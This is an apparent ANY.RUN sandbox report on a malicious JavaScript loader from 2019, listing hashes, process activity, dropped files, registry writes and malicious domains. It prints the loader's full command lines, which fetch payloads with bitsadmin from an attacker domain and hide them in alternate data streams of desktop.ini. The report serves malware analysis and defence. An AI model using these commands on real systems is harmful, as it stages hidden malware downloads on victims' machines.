File name: bmd7i29.JS

Full analysis: https://app.any.run/tasks/ba44468c-a9ba-4a59-8305-1ef465c945b9
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 21, 2019, 16:41:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5: 12E8BA05EFFEA4B55613C16B1439986F
SHA1: BA1B7B7BB7C4E028C0F392C1EF19B58569DBAC7B
SHA256: 2C7FA3A8BCC108185DA9F9CB9C4218578FA30CF03CA9A8FEA3379CB89374FB77
SSDEEP: 3:YYGRacVpKjnAMHW6MdMI5sF:5rkpKjWdDw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITSADMIN.EXE for downloading application

      • WScript.exe (PID: 1412)
    • Changes settings of System certificates

      • WScript.exe (PID: 1412)
  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 1412)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 1412)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 1412)
  • INFO

    No info indicators.
No Malware configuration.

TRiD

.bs/bin | PrintFox (C64) bitmap (100)
Total processes: 55
Monitored processes: 12
Malicious processes: 1
Suspicious processes: 0


Process information

PID: 1412
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\bmd7i29.JS"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 388
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 15302 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvta.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvta.jpg
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 2147954557
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
PID: 2200
CMD: "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvta.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvta.jpg"
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3324
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 75668 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtb.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
PID: 2428
CMD: "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtb.jpg"
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3788
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 75635 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtc.jpg.zip C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
PID: 2496
CMD: "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtc.jpg"
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 2748
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 58255 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdwwn.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
PID: 2928
CMD: "C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif" > "C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif"&&erase "C:\Users\Public\Libraries\yanki\lpquayevvtdwwn.gif"
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3540
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer 23221 /priority foreground https://t3eiyui93at8.admi2939vcu94.gq/?04/lpquayevvtdx.gif.zip C:\Users\Public\Libraries\yanki\lpquayevvtdx.gif
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: BITS administration utility
Exit code: 0
Version: 7.5.7600.16385 (win7_rtm.090713-1255)
Total events: 179
Read events: 143
Write events: 35
Delete events: 1

Modification events

PID | Process | Operation | Key | Name | Value
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | EnableFileTracing | 0
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | EnableConsoleTracing | 0
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | FileTracingMask | 4294901760
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | ConsoleTracingMask | 4294901760
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | MaxFileSize | 1048576
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32 | FileDirectory | %windir%\tracing
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS | EnableFileTracing | 0
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS | EnableConsoleTracing | 0
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS | FileTracingMask | 4294901760
1412 | WScript.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS | ConsoleTracingMask | 4294901760
Executable files: 0
Suspicious files: 4
Text files: 2
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1412 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@00rr32jwi949ikrfm77[1].txt | text
  MD5: 388CC579231FB9A55E1F7F5A7ECCA726
  SHA256: 76D1AC39A8C631633581D2CFCB6364C61881F686F32BAC230BD99CC954566F25
2496 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtc.jpg | binary
  MD5: 22BF214121CFB0107CD5642995B62AE2
  SHA256: 6A75F5C9D9A05025A5BBFBB3F328AA1B533B8F263E081FAAE6AF5621EE773164
2428 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtb.jpg | binary
  MD5: F2CF0BC2A11C62AFA0FD80A3E8CD704D
  SHA256: C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
2928 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdwwn.gif | binary
  MD5: 5B1B26B50C386467713C19DFADB6E5D7
  SHA256: F7145CD84BBB76FE5AEC655680781E3000B56343091D2313D205D1DBA798F49D
3332 | cmd.exe | C:\Users\Public\Libraries\yanki\desktop.ini:lpquayevvtdx.gif | binary
  MD5: 420CA9F3B004FB712BB65FCEF471E528
  SHA256: 963B620478D180D7CFB7951D997D8FE55F73BB8C04ECA7CA5944E1D20B0271F5
1412 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\wwa5tur9iae3_00rr32jwi949ikrfm77_ml[1].txt | xml
  MD5: 64922403CB5BA44BCA4AA2F972A8A166
  SHA256: 957EE6033CE0E9227C023014EE13AB4AC0D184A0B64DCB8398531291EC20A7B8
HTTP(S) requests: 0
TCP/UDP connections: 5
DNS requests: 3
Threats: 4

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1412 | WScript.exe | 104.18.37.173:443 | wwa5tur9iae3.00rr32jwi949ikrfm77.ml | Cloudflare Inc | US | suspicious
1412 | WScript.exe | 104.28.21.40:443 | t3eiyui93at8.admi2939vcu94.gq | Cloudflare Inc | US | malicious

DNS requests

Domain | IP | Reputation
wwa5tur9iae3.00rr32jwi949ikrfm77.ml | 104.18.37.173, 104.18.36.173 | suspicious
t3eiyui93at8.admi2939vcu94.gq | 104.28.21.40, 104.28.20.40 | malicious

Threats

Class | Message
Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain
Potentially Bad Traffic | ET INFO Suspicious Domain (*.ml) in TLS SNI
Potentially Bad Traffic | ET INFO DNS Query for Suspicious .gq Domain
Potentially Bad Traffic | ET INFO Suspicious Domain (*.gq) in TLS SNI
No debug info